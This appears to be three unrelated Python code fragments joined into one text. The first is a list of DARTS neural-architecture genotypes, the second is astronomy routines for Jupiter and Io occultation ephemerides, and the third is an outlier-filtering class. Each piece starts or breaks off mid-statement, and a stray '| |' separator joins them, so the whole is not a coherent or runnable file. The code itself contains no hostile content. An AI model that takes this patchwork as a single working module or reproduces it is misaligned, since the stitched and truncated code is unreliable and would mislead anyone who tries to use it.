DARTS_TS_18_CIFAR10_GAMMA_0_5 = Genotype(normal=[('skip_connect', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('dil_conv_5x5', 1), ('skip_connect', 0), ('dil_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('skip_connect', 1), ('skip_connect', 2), ('max_pool_3x3', 0), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 2), ('max_pool_3x3', 0)], reduce_concat=range(2, 6))
DARTS_TS_18_CIFAR10_GAMMA_0_1 = Genotype(normal=[('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('skip_connect', 1), ('skip_connect', 0), ('dil_conv_5x5', 1), ('skip_connect', 0), ('dil_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('avg_pool_3x3', 1), ('max_pool_3x3', 0), ('skip_connect', 2), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 2), ('avg_pool_3x3', 0)], reduce_concat=range(2, 6))
DARTS_TS_18_CIFAR10_GAMMA_2 = Genotype(normal=[('skip_connect', 0), ('sep_conv_5x5', 1), ('skip_connect', 0), ('skip_connect', 1), ('sep_conv_3x3', 0), ('dil_conv_3x3', 1), ('skip_connect', 0), ('dil_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('avg_pool_3x3', 0), ('avg_pool_3x3', 1), ('skip_connect', 2), ('avg_pool_3x3', 0), ('skip_connect', 2), ('avg_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 3)], reduce_concat=range(2, 6))
DARTS_TS_18_CIFAR10_GAMMA_3 = Genotype(normal=[('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('skip_connect', 1), ('skip_connect', 0), ('dil_conv_5x5', 1), ('skip_connect', 0), ('dil_conv_5x5', 1)], normal_concat=range(2, 6), reduce=[('avg_pool_3x3', 1), ('avg_pool_3x3', 0), ('skip_connect', 2), ('avg_pool_3x3', 1), ('skip_connect', 2), ('avg_pool_3x3', 0), ('skip_connect', 2), ('avg_pool_3x3', 0)], reduce_concat=range(2, 6))
DARTS_TS_18_CIFAR10_LAMBDA_2 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('dil_conv_5x5', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('skip_connect', 0), ('avg_pool_3x3', 1), ('skip_connect', 2), ('max_pool_3x3', 0), ('avg_pool_3x3', 1), ('skip_connect', 2), ('skip_connect', 2), ('skip_connect', 3)], reduce_concat=range(2, 6))
DARTS_TS_18_CIFAR10_LAMBDA_0_1 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('skip_connect', 2), ('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('dil_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('avg_pool_3x3', 1), ('avg_pool_3x3', 0), ('skip_connect', 2), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 3), ('skip_connect', 2), ('avg_pool_3x3', 0)], reduce_concat=range(2, 6))
DARTS_TS_18_CIFAR10_LAMBDA_0_5 = Genotype(normal=[('sep_conv_3x3', 0), ('dil_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_5x5', 1), ('skip_connect', 0), ('dil_conv_3x3', 1), ('skip_connect', 0), ('skip_connect', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('dil_conv_3x3', 1), ('skip_connect', 2), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 3), ('skip_connect', 3), ('skip_connect', 2)], reduce_concat=range(2, 6))
DARTS_TS_18_CIFAR10_LAMBDA_3 = Genotype(normal=[('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('dil_conv_5x5', 1), ('skip_connect', 2), ('avg_pool_3x3', 0), ('avg_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 2), ('avg_pool_3x3', 0)], reduce_concat=range(2, 6))
PDARTS_TS_18_CIFAR100_LAMBDA_3 = Genotype(normal=[('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_5x5', 1), ('dil_conv_3x3', 1), ('sep_conv_3x3', 2), ('sep_conv_3x3', 0), ('sep_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 1), ('sep_conv_3x3', 2), ('max_pool_3x3', 0), ('sep_conv_5x5', 1), ('dil_conv_3x3', 1), ('dil_conv_3x3', 2)], reduce_concat=range(2, 6))
PDARTS_TS_18_CIFAR100_LAMBDA_0_1 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('dil_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('sep_conv_5x5', 1), ('avg_pool_3x3', 0), ('sep_conv_3x3', 1), ('avg_pool_3x3', 0), ('dil_conv_5x5', 3), ('avg_pool_3x3', 0), ('dil_conv_3x3', 1)], reduce_concat=range(2, 6))
PDARTS_TS_18_CIFAR100_LAMBDA_0_5 = Genotype(normal=[('skip_connect', 0), ('sep_conv_5x5', 1), ('sep_conv_3x3', 0), ('skip_connect', 1), ('sep_conv_3x3', 0), ('sep_conv_3x3', 3), ('sep_conv_3x3', 0), ('dil_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('skip_connect', 0), ('skip_connect', 1), ('skip_connect', 0), ('skip_connect', 1), ('avg_pool_3x3', 0), ('avg_pool_3x3', 1), ('avg_pool_3x3', 0), ('dil_conv_5x5', 4)], reduce_concat=range(2, 6))
PDARTS_TS_18_CIFAR100_LAMBDA_2 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('dil_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_5x5', 2), ('sep_conv_3x3', 0), ('dil_conv_5x5', 4)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('skip_connect', 1), ('avg_pool_3x3', 0), ('sep_conv_5x5', 1), ('avg_pool_3x3', 0), ('sep_conv_3x3', 2), ('max_pool_3x3', 0), ('dil_conv_3x3', 1)], reduce_concat=range(2, 6))
PDARTS_TS_18_CIFAR100_AB_1 = Genotype(normal=[('dil_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 2), ('sep_conv_3x3', 0), ('dil_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_3x3', 3)], normal_concat=range(2, 6), reduce=[('skip_connect', 0), ('dil_conv_5x5', 1), ('avg_pool_3x3', 0), ('skip_connect', 1), ('skip_connect', 0), ('sep_conv_5x5', 2), ('skip_connect', 0), ('sep_conv_3x3', 1)], reduce_concat=range(2, 6))
PDARTS_TS_18_CIFAR100_AB_4 = Genotype(normal=[('sep_conv_3x3', 0), ('dil_conv_3x3', 1), ('sep_conv_3x3', 0), ('skip_connect', 1), ('max_pool_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_5x5', 1)], normal_concat=range(2, 6), reduce=[('avg_pool_3x3', 0), ('skip_connect', 1), ('avg_pool_3x3', 0), ('sep_conv_5x5', 2), ('avg_pool_3x3', 0), ('dil_conv_3x3', 1), ('avg_pool_3x3', 0), ('sep_conv_3x3', 4)], reduce_concat=range(2, 6))
coop_cifar10_1 = Genotype(normal=[('sep_conv_5x5', 1), ('sep_conv_5x5', 0), ('sep_conv_5x5', 1), ('sep_conv_5x5', 2), ('sep_conv_5x5', 1), ('sep_conv_5x5', 0), ('sep_conv_5x5', 1), ('sep_conv_3x3', 2)], normal_concat=range(2, 6), reduce=[('sep_conv_3x3', 0), ('max_pool_3x3', 1), ('max_pool_3x3', 1), ('dil_conv_3x3', 0), ('skip_connect', 3), ('skip_connect', 2), ('skip_connect', 3), ('skip_connect', 2)], reduce_concat=range(2, 6))
coop_cifar10_2 = Genotype(normal=[('dil_conv_5x5', 1), ('sep_conv_5x5', 0), ('sep_conv_5x5', 1), ('dil_conv_3x3', 2), ('sep_conv_5x5', 1), ('dil_conv_5x5', 3), ('sep_conv_5x5', 1), ('sep_conv_5x5', 3)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('dil_conv_3x3', 1), ('sep_conv_3x3', 0), ('skip_connect', 2), ('skip_connect', 2), ('max_pool_3x3', 0), ('dil_conv_5x5', 4), ('max_pool_3x3', 0)], reduce_concat=range(2, 6))
coop_cifar10_change_1 = Genotype(normal=[('sep_conv_5x5', 1), ('sep_conv_3x3', 0), ('sep_conv_5x5', 1), ('dil_conv_5x5', 2), ('sep_conv_5x5', 0), ('sep_conv_5x5', 1), ('dil_conv_3x3', 4), ('skip_connect', 2)], normal_concat=range(2, 6), reduce=[('skip_connect', 1), ('sep_conv_3x3', 0), ('sep_conv_5x5', 0), ('dil_conv_5x5', 2), ('sep_conv_5x5', 3), ('max_pool_3x3', 0), ('skip_connect', 1), ('skip_connect', 2)], reduce_concat=range(2, 6))
coop_cifar10_change_2 = Genotype(normal=[('sep_conv_5x5', 1), ('sep_conv_5x5', 0), ('sep_conv_3x3', 1), ('sep_conv_5x5', 0), ('sep_conv_3x3', 1), ('skip_connect', 2), ('dil_conv_3x3', 4), ('sep_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('sep_conv_3x3', 1), ('dil_conv_5x5', 2), ('skip_connect', 1), ('skip_connect', 2), ('skip_connect', 3), ('skip_connect', 2), ('max_pool_3x3', 0)], reduce_concat=range(2, 6))
coop_cifar10_change_1_lambda_0_5 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_5x5', 1), ('sep_conv_5x5', 1), ('dil_conv_5x5', 2), ('sep_conv_5x5', 0), ('sep_conv_3x3', 2), ('sep_conv_5x5', 0), ('sep_conv_5x5', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('max_pool_3x3', 1), ('skip_connect', 2), ('max_pool_3x3', 0), ('skip_connect', 2), ('max_pool_3x3', 1), ('skip_connect', 3), ('skip_connect', 4)], reduce_concat=range(2, 6))
coop_cifar10_change_2_lambda_0_5 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_5x5', 1), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('skip_connect', 0), ('sep_conv_3x3', 3)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('max_pool_3x3', 1), ('skip_connect', 2), ('max_pool_3x3', 0), ('skip_connect', 2), ('max_pool_3x3', 0), ('skip_connect', 2), ('avg_pool_3x3', 0)], reduce_concat=range(2, 6))
coop_cifar10_change_1_lambda_2 = Genotype(normal=[('sep_conv_5x5', 1), ('sep_conv_3x3', 0), ('sep_conv_5x5', 0), ('dil_conv_5x5', 1), ('skip_connect', 0), ('skip_connect', 2), ('sep_conv_5x5', 1), ('skip_connect', 3)], normal_concat=range(2, 6), reduce=[('sep_conv_3x3', 0), ('dil_conv_3x3', 1), ('max_pool_3x3', 0), ('skip_connect', 2), ('dil_conv_5x5', 3), ('sep_conv_5x5', 0), ('skip_connect', 4), ('skip_connect', 2)], reduce_concat=range(2, 6))
coop_cifar10_change_2_lambda_2 = Genotype(normal=[('sep_conv_5x5', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 1), ('sep_conv_3x3', 2), ('sep_conv_3x3', 1), ('skip_connect', 2), ('skip_connect', 2), ('skip_connect', 4)], normal_concat=range(2, 6), reduce=[('dil_conv_3x3', 1), ('max_pool_3x3', 0), ('skip_connect', 2), ('max_pool_3x3', 0), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 4), ('max_pool_3x3', 0)], reduce_concat=range(2, 6))
coop_cifar10_change_1_lambda_0_1 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_5x5', 1), ('skip_connect', 0), ('sep_conv_5x5', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('sep_conv_3x3', 1), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 3), ('skip_connect', 2), ('skip_connect', 2), ('skip_connect', 3)], reduce_concat=range(2, 6))
coop_cifar10_change_2_lambda_0_1 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 1), ('skip_connect', 0)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('max_pool_3x3', 1), ('max_pool_3x3', 0), ('max_pool_3x3', 1), ('skip_connect', 2), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 3)], reduce_concat=range(2, 6))
coop_cifar10_change_1_lambda_3 = Genotype(normal=[('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('skip_connect', 2), ('sep_conv_3x3', 1), ('skip_connect', 2), ('sep_conv_3x3', 0), ('skip_connect', 2), ('sep_conv_5x5', 1)], normal_concat=range(2, 6), reduce=[('sep_conv_5x5', 0), ('dil_conv_5x5', 1), ('sep_conv_3x3', 1), ('avg_pool_3x3', 0), ('max_pool_3x3', 0), ('sep_conv_5x5', 2), ('skip_connect', 4), ('skip_connect', 2)], reduce_concat=range(2, 6))
coop_cifar10_change_2_lambda_3 = Genotype(normal=[('dil_conv_5x5', 1), ('sep_conv_3x3', 0), ('sep_conv_5x5', 1), ('skip_connect', 2), ('sep_conv_5x5', 2), ('sep_conv_3x3', 0), ('skip_connect', 2), ('sep_conv_5x5', 1)], normal_concat=range(2, 6), reduce=[('sep_conv_5x5', 1), ('sep_conv_3x3', 0), ('skip_connect', 2), ('max_pool_3x3', 1), ('skip_connect', 3), ('max_pool_3x3', 1), ('skip_connect', 3), ('skip_connect', 4)], reduce_concat=range(2, 6))
coop_pretrain_cifar10_1_lambda_0_5 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('dil_conv_3x3', 1), ('skip_connect', 0), ('skip_connect', 1), ('skip_connect', 0), ('skip_connect', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('avg_pool_3x3', 1), ('skip_connect', 2), ('avg_pool_3x3', 0), ('skip_connect', 2), ('avg_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 3)], reduce_concat=range(2, 6))
coop_pretrain_cifar10_2_lambda_0_5 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('skip_connect', 1), ('skip_connect', 0), ('skip_connect', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 1), ('max_pool_3x3', 0), ('max_pool_3x3', 0), ('skip_connect', 2), ('dil_conv_5x5', 2), ('skip_connect', 3), ('skip_connect', 2), ('skip_connect', 3)], reduce_concat=range(2, 6))
coop_pretrain_cifar10_1_lambda_1 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_3x3', 2), ('sep_conv_3x3', 0), ('dil_conv_3x3', 2), ('sep_conv_3x3', 0), ('skip_connect', 2)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('dil_conv_3x3', 1), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 2), ('dil_conv_3x3', 3), ('skip_connect', 2), ('skip_connect', 0)], reduce_concat=range(2, 6))
coop_pretrain_cifar10_2_lambda_1 = Genotype(normal=[('sep_conv_3x3', 1), ('sep_conv_5x5', 0), ('sep_conv_3x3', 0), ('sep_conv_5x5', 1), ('sep_conv_3x3', 1), ('sep_conv_5x5', 0), ('sep_conv_3x3', 1), ('skip_connect', 0)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('sep_conv_3x3', 1), ('dil_conv_5x5', 2), ('skip_connect', 1), ('dil_conv_5x5', 3), ('dil_conv_3x3', 1), ('dil_conv_3x3', 3), | |
2 * np.pi) - np.pi
)
def interpolate_angle(x, xp, yp):
"""
Interpolate an angular quantity on domain [-pi, pi) and avoid
discountinuities.
"""
cosy = np.interp(x, xp, np.cos(yp))
siny = np.interp(x, xp, np.sin(yp))
return np.arctan2(siny, cosy)
# Inclination of the starry map = 90 - latitude of the central point of
# the observed disc
data["inc"] = interpolate_angle(
times.mjd,
times_jpl.mjd,
np.pi / 2 * u.rad - eph["PDObsLat"].to(u.rad),
).to(u.deg)
# Rotational phase of the starry map is the observer longitude
data["theta"] = (
interpolate_angle(
times.mjd,
times_jpl.mjd,
eph["PDObsLon"].to(u.rad) - np.pi * u.rad,
).to(u.deg)
) + 180 * u.deg
# Obliquity of the starry map is the CCW angle from the celestial
# NP to the NP of the target body
data["obl"] = interpolate_angle(
times.mjd,
times_jpl.mjd,
eph["NPole_ang"].to(u.rad),
).to(u.deg)
# Compute the location of the subsolar point relative to the central
# point of the disc
lon_subsolar = subtract_angles(
np.array(eph["PDSunLon"].to(u.rad)),
np.array(eph["PDObsLon"].to(u.rad)),
)
lon_subsolar = 2 * np.pi - lon_subsolar # positive lon. is to the east
lat_subsolar = subtract_angles(
np.array(eph["PDSunLat"].to(u.rad)),
np.array(eph["PDObsLat"].to(u.rad)),
)
# Location of the subsolar point in cartesian Starry coordinates
xs = np.array(eph["r"]) * np.cos(lat_subsolar) * np.sin(lon_subsolar)
ys = np.array(eph["r"]) * np.sin(lat_subsolar)
zs = np.array(eph["r"]) * np.cos(lat_subsolar) * np.cos(lon_subsolar)
data["xs"] = np.interp(times.mjd, times_jpl.mjd, xs) * u.AU
data["ys"] = np.interp(times.mjd, times_jpl.mjd, ys) * u.AU
data["zs"] = np.interp(times.mjd, times_jpl.mjd, zs) * u.AU
return data
def get_body_vectors(times, body_id="501", step="1m", location="@sun"):
"""
Returns the JPL Horizons position (and velocity) vector of a given Solar
System body for the requested times.
Args:
times (astropy.time): Observation times.
body_id (str, optional): NAIF code for the target body. By default '501'
for Io.
step (str, optional): Step size for querying JPL Horizons. Minimum is "1m".
Make sure this is sufficiently small for accurate ephemeris.
location (str, optional): The origin of the coordinate system. By default
"@sun" for heliocentric position vectors. Other options include "500"
for center of earth and "@ssb" for Solar System Barycenter.
Returns:
astropy.timeseries.TimeSeries
An astropy.TimeSeries object specifying the (x, y, z) coordinates and
(vx, vy, vz) velocity components and distance r of the target body.
"""
start = times.isot[0]
# because Horizons time range doesn't include the endpoint we need to add
# some extra time
if step[-1] == "m":
padding = 2 * float(step[:-1]) / (60 * 24)
elif step[-1] == "h":
padding = 2 * float(step[:-1]) / 24
elif step[-1] == "d":
padding = 2 * float(step[:-1])
else:
raise ValueError(
"Unrecognized JPL Horizons step size. Use '1m' or '1h' for example."
)
end = Time(times.mjd[-1] + padding, format="mjd").isot
# Query JPL Horizons
epochs = {"start": start, "stop": end, "step": step}
obj = Horizons(id=body_id, epochs=epochs, id_type="id", location=location)
vec = obj.vectors()
times_jpl = Time(vec["datetime_jd"], format="jd")
# Store all data in a TimeSeries object
data = TimeSeries(time=times)
data["x"] = np.interp(times.mjd, times_jpl.mjd, vec["x"]) * vec["x"].unit
data["y"] = np.interp(times.mjd, times_jpl.mjd, vec["y"]) * vec["y"].unit
data["z"] = np.interp(times.mjd, times_jpl.mjd, vec["z"]) * vec["z"].unit
data["vx"] = (
np.interp(times.mjd, times_jpl.mjd, vec["vx"]) * vec["vx"].unit
)
data["vy"] = (
np.interp(times.mjd, times_jpl.mjd, vec["vy"]) * vec["vy"].unit
)
data["vz"] = (
np.interp(times.mjd, times_jpl.mjd, vec["vz"]) * vec["vz"].unit
)
data["r"] = (
np.interp(times.mjd, times_jpl.mjd, vec["range"]) * vec["range"].unit
)
return data
def get_effective_jupiter_radius(latitude, method="howell"):
"""
Return radius of jupiter (in km) at the 2.2 mbar level,
given the Jupiter planetocentric latitude in degrees.
"""
if method == "howell":
# Conversion factors
dpr = 360.0 / (2.0 * np.pi)
# Compute powers of sin(lat)
u0 = 1.0
u1 = np.sin(latitude / dpr)
u2 = u1 * u1
u3 = u1 * u2
u4 = u1 * u3
u5 = u1 * u4
u6 = u1 * u5
# Legendre polynomials
p0 = 1
p1 = u1
p2 = (-1.0 + 3.0 * u2) / 2.0
p3 = (-3.0 * u1 + 5.0 * u3) / 2.0
p4 = (3.0 - 30.0 * u2 + 35.0 * u4) / 8.0
p5 = (15.0 * u1 - 70.0 * u3 + 63.0 * u5) / 8.0
p6 = (-5.0 + 105.0 * u2 - 315.0 * u4 + 231.0 * u6) / 16.0
# Find the radius at 100 mbar
jr = (
71541.0
- 1631.3 * p0
+ 16.8 * p1
- 3136.2 * p2
- 6.9 * p3
+ 133.0 * p4
- 18.9 * p5
- 8.5 * p6
)
jr += 85.0 # Find the radius at 2.2 mbar
# According to <NAME>, this is the
# half light point for occultations.
jr += -27 # subtract one scale height due to bending of light
return jr
else:
# Radius in km, by eye estimate
reff_100 = np.array(
[66896, 67350, 71400, 71541, 70950, 70400, 67950, 66896]
)
lat_100 = np.array([-90, -70.0, -10.0, 0.0, 20.0, 27.0, 60.0, 90])
# Cubic interpolate
f = interp1d(lat_100, reff_100, kind="cubic", fill_value="extrapolate")
jr = float(f(latitude))
# Correction factor for going from 100->2.2mbar
jr += -np.log(2.2 / 100) * 27 - 27 # scale height 27km
return jr
def get_occultation_latitude(x_io, y_io, re):
"""
Compute the approximate latitude of Jupiter at which an occultation occurs.
In this case we assume that the Jupiter is a sphere with the radius equal
to the equatorial radius. This assumption is good enough for computing
the latitude because occultations occur at around +-20 or so degrees N.
"""
y = x_io
z = y_io
x = np.sqrt(re ** 2 - z ** 2 - y ** 2)
ang = np.sqrt(x ** 2 + y ** 2) / z
theta = np.arctan2(np.sqrt(x ** 2 + y ** 2), z)
return 90 - theta * 180 / np.pi
def get_occultor_position_and_radius(
eph_occulted,
eph_occultor,
occultor_is_jupiter=False,
rotate=True,
return_occ_lat=False,
**kwargs
):
"""
Given the ephemeris of an occulted object and an occultor, the function
returns the relative position of the occultor in Starry format. If the
occultor is Jupiter the radius isn't trivial to compute because Jupiter is
an oblate spheroid. In that case we instead compute the effective radius at
a given planetocentric latitude at which the occultation is happening.
This is implemented in :func:`get_jupiter_effective_radius`.
Args:
eph_occulted (astropy.timeseries.TimeSeries): ephemeris of the occulted
body.
eph_occultor (astropy.timeseries.TimeSeries): ephemeris of the occultor.
occultor_is_jupiter (bool): Set to true if occultor is Jupiter because
Jupiter is non-spherical and its radius needs to be estimated in a
different way. Defaults to False.
rotate (bool): Rotate the position vectors to a frame in which the
obliquity of the occultor is zero. Defaults to True.
return_occ_lat (bool): Optionally return the occultation latitude if
the occultor is Jupiter. Defaults to False.
Returns:
list: (xo, yo, ro)
"""
delta_ra = (eph_occultor["RA"] - eph_occulted["RA"]).to(u.arcsec)
delta_dec = (eph_occultor["DEC"] - eph_occulted["DEC"]).to(u.arcsec)
xo = (
-delta_ra
* np.cos(eph_occulted["DEC"].to(u.rad))
/ (0.5 * eph_occulted["ang_width"].to(u.arcsec))
).value
yo = delta_dec / (0.5 * eph_occulted["ang_width"].to(u.arcsec)).value
if occultor_is_jupiter is False:
# Convert everything to units where the radius of Io = 1
rad_occ = eph_occultor["ang_width"].to(u.arcsec) / eph_occulted[
"ang_width"
].to(u.arcsec)
ro = np.mean(rad_occ).value
# Jupiter is non-spherical so we need to compute an effective radius
else:
re = 71541 + 59 # equatorial radius of Jupiter (approx) [km]
r_io = 1821.3 * u.km # radius of Io (km)
jup_dist = eph_occultor["dist"].to(u.km)
xo = (
((-delta_ra * np.cos(eph_occultor["DEC"].to(u.rad)))).to(u.rad)
* jup_dist
/ r_io
)
yo = delta_dec.to(u.rad) * jup_dist / r_io
obl = eph_occulted["obl"]
inc = np.mean(eph_occultor["inc"])
xo_unrot = xo.value
yo_unrot = yo.value
# Rotate to coordinate system where the obliquity of Io is 0
theta_rot = -obl.to(u.rad).value
xo_rot, yo_rot = rotate_vectors(
np.array(xo_unrot), np.array(yo_unrot), np.array(theta_rot)
)
# Choose point inside Jupiter
idx = np.argmin(np.abs(xo_rot))
# Position of Io relative to Jupiter in km
x_io = -xo_rot[idx] * r_io.value
y_io = -yo_rot[idx] * r_io.value
lat = get_occultation_latitude(x_io, y_io, re)
reff = get_effective_jupiter_radius(lat, **kwargs)
ro = reff / r_io.value
# Rotate position vefctors such that obliquity of the occultor is 0
if rotate:
theta_rot = -eph_occulted["obl"].to(u.rad).value
xo, yo = rotate_vectors(
np.array(xo), np.array(yo), np.array(theta_rot)
)
else:
xo = xo
yo = yo
if return_occ_lat:
if not occultor_is_jupiter:
raise ValueError(
"Occultation | |
<gh_stars>0
# -*- coding: utf-8 -*-
"""
"""
import numpy as np
from scipy import interpolate
np.nan
"""
*****************************************************************************************************************************
Filter class is comprising methods for data filtering and smoothing functionality
constants:: used in methods as a fix value
Flags used in methods to identify whether the method is successfull or failure.
error : 'error'
success : 'success'
Error messages used in different methods.
eMsg1 : 'Internal Error'
eMsg2 : 'For fixed moving average provide odd numbers of window '
eMsg3 : 'Window is bigger than the input length.'
eMsg4 : 'Number of input values less than 3'
eMsg5 : 'Provide a proper moving average type'
eMsg6 : 'Provide a Integer value '
eMsg7 : 'There is no outlier values to interpolate'
eMsg8 : 'Outlier percentage is 100 %. Put proper Max and min values'
eMsg9 : 'Provide a valid interpolation type'
arrayLenLimit : lower limit for number of data in input array i.e 3
stdDevFactorMax : standard deviation factor upper limit i.e 6
stdDevFactorMin : standard deviation factor lower limit i.e 1
methods::
maxMin(inDataArray, inMaxLim, inMinLim) : Finding outlier indexes of input array or input data based on max and min limit provided by the user.
stdDev(inDataArray, inStdDevFact) : This measures the amount of variation or dispersion in the input array or input data depending on the standard deviation factor.
movingAvg(inDataArray, inWindow, inMavgType) : This calculates the moving average for the data to move forward,backward or fixed by the number of windows.
countConsec(indexVal, inOutlierArray) : This methods calculates the 1st consecutive dataset in a given array staring from a given index
count(inOutlierArray): This methods calculates number of consecutive data sets
interpolation(inDataArray, inOutlierArray, inIntpTyp, inMaxLim, inMinLim): method to construct new data points within the range of a discrete set of known data points
*****************************************************************************************************************************"""
class Filter():
# creates constructor with the instance self to access the attributes and methods of the class
def __init__(self):
pass #null operator
error = 'error'
success = 'success'
eMsg1 = 'Internal Error'
eMsg2 = 'For fixed moving average provide odd numbers of window '
eMsg3 = 'Window is bigger than the input length.'
eMsg4 = 'Number of input values less than 3'
eMsg5 = 'Provide an proper moving average type'
eMsg6 = 'Provide an Integer value '
eMsg7 = 'There is no outlier values to interpolate'
eMsg8 = 'Outlier percentage is 100 %. Put proper Max and min values'
eMsg9 = 'Provide a valid interpolation type'
cArrayLenLimit = 3
cStdDevFactMax = 6
cStdDevFactMin = 1
"""
******************************************************************************************************************************************
method maxMin : Finding outlier indexes based on max and min limit provided by user
inDataArray : input array provided to find outlier
inMaxLim : Max limit provided by user
inMinLim : Min limit provided by user
variables:
arrayMaxval : Max value in input array
arrayMinval : Min value in input array
return:
flag : success or error
outOPercent : Calculates de amount of data that is identyfied as an Outlier with respect to the total data. Calculated in [%]
outOutlierArray : Array with identyfied rows that are detected as Outliers.
msg : success or error massage reason
*******************************************************************************************************************************************"""
def maxMin(self, inDataArray, inMaxLim, inMinLim):
#initializing
outOutlierArray = []
outOPercent = 0
flag = Filter.success
msg = ''
# providing try block to handle exceptions
try:
# checking valid length of array
if (len(inDataArray) < Filter.cArrayLenLimit):
msg = Filter.eMsg4 # 'Number of input values less than 3'
flag = Filter.error
return flag, outOPercent, outOutlierArray, msg
# checking if max value provided is less than min value
if (inMaxLim < inMinLim):
flag = Filter.error
msg = 'Max value is lower than Min value'
# checking if max value provided is equal to min value
elif (inMaxLim == inMinLim):
flag = Filter.error
msg = 'Max value equal to than Min value'
else:
arrayMaxVal = max(inDataArray) #getting max input data
arrayMinVal = min(inDataArray) #getting min input data
#checking if there is any outlier values
if(inMaxLim >= arrayMaxVal and inMinLim <= arrayMinVal):
flag = Filter.error
msg = Filter.eMsg7 # meassage 'There is no outlier values to interpolate'
return flag, outOPercent, outOutlierArray, msg
#fininding outlier index of original array
for index in range(len(inDataArray)):
if inDataArray[index] > inMaxLim or inDataArray[index] < inMinLim:
outOutlierArray.append(index)
outOPercent = len(outOutlierArray) * 100 / len(inDataArray) #percentage of outlier
#checking if 100 percent of data is outliers
if (outOPercent == 100):
flag = Filter.error
msg = Filter.eMsg8
# handling exceptions in except block
except:
flag = Filter.error
msg = Filter.eMsg1 # unexpected error
return flag, outOPercent, outOutlierArray, msg # returing flag(sucess or error),outlier percentage,outlier index, message
"""
*****************************************************************************************************************************
method stdDev : This method provide measure of the amount of variation or dispersion in input data using standard deviation factor.
inDataArray : input array provided to find outlier
inStdDevFact : Factor that multiply the Standard Deviation and is used to calculate the MaxValue and MinValue for the limits.
currenty using standard deviation factor only for values 1 to 6
variables:
stdDev : Calculates the Standard Deviation of the Data
stdMean : Calculates the Mean of the Data
return:
flag : success or error
outOPercent : Calculates the amount of data that is identyfied as an Outlier with respect to the total data. Calculated in [%]
